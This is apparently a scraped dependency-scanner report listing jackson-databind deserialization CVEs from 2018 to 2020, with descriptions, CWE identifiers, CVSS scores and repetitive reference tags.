THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2019-14379 suppress
SubTypeValidator.java in FasterXML jackson-databind before 2.9.9.2 mishandles default typing when ehcache is used (because of net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup), leading to remote code execution. CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-14540 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariConfig. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-14892 suppress
A flaw was discovered in jackson-databind in versions before 2.9.10, 2.8.11.5 and 2.6.7.3, where it would permit polymorphic deserialization of a malicious object using commons-configuration 1 and 2 JNDI classes. An attacker could use this flaw to execute arbitrary code. CWE-502 Deserialization of Untrusted Data, CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-16335 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariDataSource. This is a different vulnerability than CVE-2019-14540. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-16942 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-16943 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-17267 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-17531 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-20330 suppress
FasterXML jackson-databind 2.x before 2.9.10.2 lacks certain net.sf.ehcache blocking. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-8840 suppress
FasterXML jackson-databind 2.0.0 through 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-9547 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-9548 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-10673 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus). CWE-502 Deserialization of Untrusted Data, NVD-CWE-Other
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-5968 suppress
FasterXML jackson-databind through 2.8.11 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 and CVE-2017-17485 deserialization flaws. This is exploitable via two different gadgets that bypass a blacklist. CWE-502 Deserialization of Untrusted Data, CWE-184 Incomplete List of Disallowed Inputs
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-10650 suppress
A deserialization flaw was discovered in jackson-databind through 2.9.10.4. It could allow an unauthenticated user to perform code execution via ignite-jta or quartz-core: org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup, org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory, and org.quartz.utils.JNDIConnectionProvider. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-24616 suppress
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
